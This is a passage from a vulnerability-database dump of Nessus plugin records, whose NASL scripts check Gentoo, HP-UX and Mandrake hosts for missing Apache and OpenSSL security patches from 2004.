sync\n # emerge -pv '>=www-servers/apache-1.3.31'\n # emerge '>=www-servers/apache-1.3.31'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:apache\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/05/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/08/30\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/12/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-servers/apache\", unaffected:make_list(\"ge 1.3.31\"), vulnerable:make_list(\"lt 1.3.31\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Apache 1.3\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-28T14:49:25", "description": "s700_800 11.04 Webproxy server 2.1 update : \n\nTwo potential security vulnerabilities have been identified in OpenSSL by NISCC (224012/1 and 224012/2). The Common Vulnerabilities and Exposures project has referenced them as the following CAN-2004-0079, and CAN-2004-0112. The CERT summary is TA04-078A. 1. The do_change_cipher_spec function in OpenSSL allows remote attackers to cause a denial of service via a crafted SSL/TLS handshake that triggers a null dereference. CVE-2004-0079 2. The SSL/TLS handshaking, when using Kerberos ciphersuites, does not properly check the length of Kerberos tickets during a handshake, which allows remote attackers to cause a denial of service via a crafted SSL/TLS handshake that causes an out-of-bounds read. CVE-2004-0112.", "cvss3": {}, "published": "2005-03-18T00:00:00", "type": "nessus", "title": "HP-UX PHSS_30649 : HP-UX Running Apache, Remote Denial of Service (DoS) (HPSBUX01019 SSRT4717 rev.3)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2003-0020", "CVE-2004-0079", "CVE-2004-0112", "CVE-2004-0113", "CVE-2004-0174"], "modified": "2021-01-11T00:00:00", "cpe": ["cpe:/o:hp:hp-ux"], "id": "HPUX_PHSS_30649.NASL", "href": "https://www.tenable.com/plugins/nessus/17533", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHSS_30649. The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(17533);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2003-0020\", \"CVE-2004-0079\", \"CVE-2004-0112\", \"CVE-2004-0113\", \"CVE-2004-0174\");\n script_xref(name:\"HP\", value:\"emr_na-c00944046\");\n script_xref(name:\"HP\", value:\"HPSBUX01019\");\n script_xref(name:\"HP\", value:\"SSRT4717\");\n\n script_name(english:\"HP-UX PHSS_30649 : HP-UX Running Apache, Remote Denial of Service (DoS) (HPSBUX01019 SSRT4717 rev.3)\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.04 Webproxy server 2.1 update : \n\nTwo potential security vulnerabilities have been identified in OpenSSL\nby NISCC (224012/1 and 224012/2). The Common Vulnerabilities and\nExposures project has referenced them as the following CAN-2004-0079,\nand CAN-2004-0112. The CERT summary is TA04-078A. 1. The\ndo_change_cipher_spec function in OpenSSL allows remote attackers to\ncause a denial of service via a crafted SSL/TLS handshake that\ntriggers a null dereference. CVE-2004-0079 2. The SSL/TLS handshaking,\nwhen using Kerberos ciphersuites, does not properly check the length\nof Kerberos tickets during a handshake, which allows remote attackers\nto cause a denial of service via a crafted SSL/TLS handshake that\ncauses an out-of-bounds read. CVE-2004-0112.\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c00944046\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6195bc72\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHSS_30649 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/05/10\");\n script_set_attribute(attribute:\"patch_modification_date\", value:\"2007/04/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/03/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.04\"))\n{\n exit(0, \"The host is not affected since PHSS_30649 applies to a different OS release.\");\n}\n\npatches = make_list(\"PHSS_30649\", \"PHSS_30950\", \"PHSS_31830\", \"PHSS_32362\", \"PHSS_33074\", \"PHSS_33666\", \"PHSS_34203\", \"PHSS_35111\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"HP_Webproxy.HPWEB-PX-CORE\", version:\"A.02.10\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:hpux_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-29T14:11:12", "description": "Four security vulnerabilities were fixed with the 1.3.31 release of Apache. All of these issues have been backported and applied to the provided packages. Thanks to Ralf Engelschall of OpenPKG for providing the patches.\n\nApache 1.3 prior to 1.3.30 did not filter terminal escape sequences from its error logs. This could make it easier for attackers to insert those sequences into the terminal emulators of administrators viewing the error logs that contain vulnerabilities related to escape sequence handling (CVE-2003-0020).\n\nmod_digest in Apache 1.3 prior to 1.3.31 did not properly verify the nonce of a client response by using an AuthNonce secret. Apache now verifies the nonce returned in the client response to check whether it was issued by itself by means of a 'AuthDigestRealmSeed' secret exposed as an MD5 checksum (CVE-2003-0987).\n\nmod_access in Apache 1.3 prior to 1.3.30, when running on big-endian 64-bit platforms, did not properly parse Allow/Deny rules using IP addresses without a netmask. This could allow a remote attacker to bypass intended access restrictions (CVE-2003-0993).\n\nApache 1.3 prior to 1.3.30, when using multiple listening sockets on certain platforms, allows a remote attacker to cause a DoS by blocking new connections via a short-lived connection on a rarely-accessed listening socket (CVE-2004-0174). While this particular vulnerability does not affect Linux, we felt it prudent to include the fix.\n\nUpdate :\n\nDue to the changes in mod_digest.so, mod_perl needed to be rebuilt against the patched Apache packages in order for httpd-perl to properly load the module. The appropriate mod_perl packages have been rebuilt and are now available.", "cvss3": {}, "published": "2004-07-31T00:00:00", "type": "nessus", "title": "Mandrake Linux Security Advisory : apache-mod_perl (MDKSA-2004:046-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2003-0020", "CVE-2003-0987", "CVE-2003-0993", "CVE-2004-0174", "CVE-2004-1082"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:html-embperl", "p-cpe:/a:mandriva:linux:apache-mod_perl", "p-cpe:/a:mandriva:linux:mod_perl-common", "p-cpe:/a:mandriva:linux:mod_perl-devel", "cpe:/o:mandrakesoft:mandrake_linux:10.0", "cpe:/o:mandrakesoft:mandrake_linux:9.1", "cpe:/o:mandrakesoft:mandrake_linux:9.2"], "id": "MANDRAKE_MDKSA-2004-046.NASL", "href": "https://www.tenable.com/plugins/nessus/14145", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2004:046. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(14145);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2003-0020\", \"CVE-2003-0987\", \"CVE-2003-0993\", \"CVE-2004-0174\", \"CVE-2004-1082\");\n script_xref(name:\"MDKSA\", value:\"2004:046-1\");\n\n script_name(english:\"Mandrake Linux Security Advisory : apache-mod_perl (MDKSA-2004:046-1)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandrake Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Four security vulnerabilities were fixed with the 1.3.31 release of\nApache. All of these issues have been backported and applied to the\nprovided packages. Thanks to Ralf Engelschall of OpenPKG for providing\nthe patches.\n\nApache 1.3 prior to 1.3.30 did not filter terminal escape sequences\nfrom its error logs. This could make it easier for attackers to insert\nthose sequences into the terminal emulators of administrators viewing\nthe error logs that contain vulnerabilities related to escape sequence\nhandling (CVE-2003-0020).\n\nmod_digest in Apache 1.3 prior to 1.3.31 did not properly verify the\nnonce of a client response by using an AuthNonce secret. Apache now\nverifies the nonce returned in the client response to check whether it\nwas issued by itself by means of a 'AuthDigestRealmSeed' secret\nexposed as an MD5 checksum (CVE-2003-0987).\n\nmod_access in Apache 1.3 prior to 1.3.30, when running on big-endian\n64-bit platforms, did not properly parse Allow/Deny rules using IP\naddresses without a netmask. This could allow a remote attacker to\nbypass intended access restrictions (CVE-2003-0993).\n\nApache 1.3 prior to 1.3.30, when using multiple listening sockets on\ncertain platforms, allows a remote attacker to cause a DoS by blocking\nnew connections via a short-lived connection on a rarely-accessed\nlistening socket (CVE-2004-0174). While this particular vulnerability\ndoes not affect Linux, we felt it prudent to include the fix.\n\nUpdate :\n\nDue to the changes in mod_digest.so, mod_perl needed to be rebuilt\nagainst the patched Apache packages in order for httpd-perl to\nproperly load the module. The appropriate mod_perl packages have been\nrebuilt and are now available.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:HTML-Embperl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mod_perl-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mod_perl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:10.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:9.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:9.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/05/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/31\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK10.0\", reference:\"HTML-Embperl-1.3.29_1.3.6-3.1.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"apache-mod_perl-1.3.29_1.29-3.1.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"mod_perl-common-1.3.29_1.29-3.1.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", reference:\"mod_perl-devel-1.3.29_1.29-3.1.100mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"HTML-Embperl-1.3.27_1.3.4-7.1.91mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"apache-mod_perl-1.3.27_1.27-7.1.91mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"mod_perl-common-1.3.27_1.27-7.1.91mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"mod_perl-devel-1.3.27_1.27-7.1.91mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK9.2\", reference:\"HTML-Embperl-1.3.28_1.3.4-1.1.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"apache-mod_perl-1.3.28_1.28-1.1.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"mod_perl-common-1.3.28_1.28-1.1.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"mod_perl-devel-1.3.28_1.28-1.1.92mdk\", yank:\"mdk\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-27T14:55:56", "description": "s700_800 11.04 Virtualvault 4.5 OWS update : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - Two potential security vulnerabilities have been identified in OpenSSL by NISCC (224012/1 and 224012/2).\n The Common Vulnerabilities and Exposures project has referenced them as the following CAN-2004-0079, and CAN-2004-0112. The CERT summary is TA04-078A. 1. The do_change_cipher_spec function in OpenSSL allows remote attackers to cause a denial of service via a crafted SSL/TLS handshake that triggers a null dereference.\n CVE-2004-0079 2. The SSL/TLS handshaking, when using Kerberos ciphersuites, does not properly check the length of Kerberos tickets during a handshake, which allows remote attackers to cause a denial of service via a crafted SSL/TLS handshake that causes an out-of-bounds read. CVE-2004-0112. (HPSBUX01019 SSRT4717)\n\n - A potential security vulnerability has been identified with Apache running on HP-UX where a buffer overflow could be exploited remotely to execute arbitrary code.\n\n - A potential security vulnerability has been identified with HP-UX running Apache where the vulnerability could be exploited remotely to create a Denial of Service (DoS) or to execute arbitrary code.\n\n - A potential security vulnerability has been identified with Apache running on HP-UX where the vulnerability could be exploited remotely to create a Denial of Service (DoS) or to bypass access restrictions.", "cvss3": {}, "published": "2005-03-18T00:00:00", "type": "nessus", "title": "HP-UX PHSS_30648 : s700_800 11.04 Virtualvault 4.5 OWS update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2003-0020", "CVE-2004-0079", "CVE-2004-0112", "CVE-2004-0113", "CVE-2004-0174"], "modified": "2021-01-11T00:00:00", "cpe": ["cpe:/o:hp:hp-ux"], "id": "HPUX_PHSS_30648.NASL", "href": "https://www.tenable.com/plugins/nessus/17532", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHSS_30648. The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(17532);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2003-0020\", \"CVE-2004-0079\", \"CVE-2004-0112\", \"CVE-2004-0113\", \"CVE-2004-0174\");\n script_xref(name:\"HP\", value:\"emr_na-c00944046\");\n script_xref(name:\"HP\", value:\"HPSBUX01019\");\n script_xref(name:\"HP\", value:\"HPSBUX01057\");\n script_xref(name:\"HP\", value:\"HPSBUX01068\");\n script_xref(name:\"HP\", value:\"HPSBUX01069\");\n script_xref(name:\"HP\", value:\"SSRT4717\");\n\n script_name(english:\"HP-UX PHSS_30648 : s700_800 11.04 Virtualvault 4.5 OWS update\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.04 Virtualvault 4.5 OWS update : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - Two potential security vulnerabilities have been\n identified in OpenSSL by NISCC (224012/1 and 224012/2).\n The Common Vulnerabilities and Exposures project has\n referenced them as the following CAN-2004-0079, and\n CAN-2004-0112. The CERT summary is TA04-078A. 1. The\n do_change_cipher_spec function in OpenSSL allows remote\n attackers to cause a denial of service via a crafted\n SSL/TLS handshake that triggers a null dereference.\n CVE-2004-0079 2. The SSL/TLS handshaking, when using\n Kerberos ciphersuites, does not properly check the\n length of Kerberos tickets during a handshake, which\n allows remote attackers to cause a denial of service via\n a crafted SSL/TLS handshake that causes an out-of-bounds\n read. CVE-2004-0112. (HPSBUX01019 SSRT4717)\n\n - A potential security vulnerability has been identified\n with Apache running on HP-UX where a buffer overflow\n could be exploited remotely to execute arbitrary code.\n\n - A potential security vulnerability has been identified\n with HP-UX running Apache where the vulnerability could\n be exploited remotely to create a Denial of Service\n (DoS) or to execute arbitrary code.\n\n - A potential security vulnerability has been identified\n with Apache running on HP-UX where the vulnerability\n could be exploited remotely to create a Denial of\n Service (DoS) or to bypass access restrictions.\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c00944046\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6195bc72\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHSS_30648 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/06/29\");\n script_set_attribute(attribute:\"patch_modification_date\", value:\"2007/04/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/03/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.04\"))\n{\n exit(0, \"The host is not affected since PHSS_30648 applies to a different OS release.\");\n}\n\npatches = make_list(\"PHSS_30648\", \"PHSS_31828\", \"PHSS_32184\", \"PHSS_33396\", \"PHSS_34119\", \"PHSS_35107\", \"PHSS_35461\", \"PHSS_35556\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"VaultTS.VV-CORE-CMN\", version:\"A.04.50\")) flag++;\nif (hpux_check_patch(app:\"VaultTS.VV-IWS\", version:\"A.04.50\")) flag++;\nif (hpux_check_patch(app:\"VaultTS.VV-IWS-GUI\", version:\"A.04.50\")) flag++;\nif (hpux_check_patch(app:\"VaultTS.VV-IWS-JAVA\", version:\"A.04.50\")) flag++;\nif (hpux_check_patch(app:\"VaultTS.VV-IWS-JK\", version:\"A.04.50\")) flag++;\nif (hpux_check_patch(app:\"VaultWS.WS-CORE\", version:\"A.04.50\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:hpux_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-28T14:49:25", "description": "s700_800 11.04 Virtualvault 4.7 OWS update : \n\nTwo potential security vulnerabilities have been identified in OpenSSL by NISCC (224012/1 and 224012/2). The Common Vulnerabilities and Exposures project has referenced them as the following CAN-2004-0079, and CAN-2004-0112. The CERT summary is TA04-078A. 1. The do_change_cipher_spec function in OpenSSL allows remote attackers to cause a denial of service via a crafted SSL/TLS handshake that triggers a null dereference. CVE-2004-0079 2. The SSL/TLS handshaking, when using Kerberos ciphersuites, does not properly check the length of Kerberos tickets during a handshake, which allows remote attackers to cause a denial of service via a crafted SSL/TLS handshake that causes an out-of-bounds read. CVE-2004-0112.", "cvss3": {}, "published": "2005-03-18T00:00:00", "type": "nessus", "title": "HP-UX PHSS_30641 : HP-UX Running Apache, Remote Denial of Service (DoS) (HPSBUX01019 SSRT4717 rev.3)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2003-0020", "CVE-2004-0079", "CVE-2004-0112", "CVE-2004-0113", "CVE-2004-0174"], "modified": "2021-01-11T00:00:00", "cpe": ["cpe:/o:hp:hp-ux"], "id": "HPUX_PHSS_30641.NASL", "href": "https://www.tenable.com/plugins/nessus/17526", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHSS_30641. The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(17526);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2003-0020\", \"CVE-2004-0079\", \"CVE-2004-0112\", \"CVE-2004-0113\", \"CVE-2004-0174\");\n script_xref(name:\"HP\", value:\"emr_na-c00944046\");\n script_xref(name:\"HP\", value:\"HPSBUX01019\");\n script_xref(name:\"HP\", value:\"SSRT4717\");\n\n script_name(english:\"HP-UX PHSS_30641 : HP-UX Running Apache, Remote Denial of Service (DoS) (HPSBUX01019 SSRT4717 rev.3)\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.04 Virtualvault 4.7 OWS update : \n\nTwo potential security vulnerabilities have been identified in OpenSSL\nby NISCC (224012/1 and 224012/2). The Common Vulnerabilities and\nExposures project has referenced them as the following CAN-2004-0079,\nand CAN-2004-0112. The CERT summary is TA04-078A. 1. The\ndo_change_cipher_spec function in OpenSSL allows remote attackers to\ncause a denial of service via a crafted SSL/TLS handshake that\ntriggers a null dereference. CVE-2004-0079 2. The SSL/TLS handshaking,\nwhen using Kerberos ciphersuites, does not properly check the length\nof Kerberos tickets during a handshake, which allows remote attackers\nto cause a denial of service via a crafted SSL/TLS handshake that\ncauses an out-of-bounds read. CVE-2004-0112.\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c00944046\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6195bc72\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHSS_30641 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/05/03\");\n script_set_attribute(attribute:\"patch_modification_date\", value:\"2007/04/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/03/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.04\"))\n{\n exit(0, \"The host is not affected since PHSS_30641 applies to a different OS release.\");\n}\n\npatches = make_list(\"PHSS_30641\", \"PHSS_30945\", \"PHSS_31058\", \"PHSS_31824\", \"PHSS_32182\", \"PHSS_33398\", \"PHSS_34121\", \"PHSS_35109\", \"PHSS_35463\", \"PHSS_35558\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"VaultWS.WS-CORE\", version:\"A.04.70\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:hpux_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-28T14:49:26", "description": "s700_800 11.04 Webproxy server 2.0 update : \n\nTwo potential security vulnerabilities have been identified in OpenSSL by NISCC (224012/1 and 224012/2). The Common Vulnerabilities and Exposures project has referenced them as the following CAN-2004-0079, and CAN-2004-0112. The CERT summary is TA04-078A. 1. The do_change_cipher_spec function in OpenSSL allows remote attackers to cause a denial of service via a crafted SSL/TLS handshake that triggers a null dereference. CVE-2004-0079 2. The SSL/TLS handshaking, when using Kerberos ciphersuites, does not properly check the length of Kerberos tickets during a handshake, which allows remote attackers to cause a denial of service via a crafted SSL/TLS handshake that causes an out-of-bounds read. CVE-2004-0112.", "cvss3": {}, "published": "2005-03-18T00:00:00", "type": "nessus", "title": "HP-UX PHSS_30650 : HP-UX Running Apache, Remote Denial of Service (DoS) (HPSBUX01019 SSRT4717 rev.3)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": 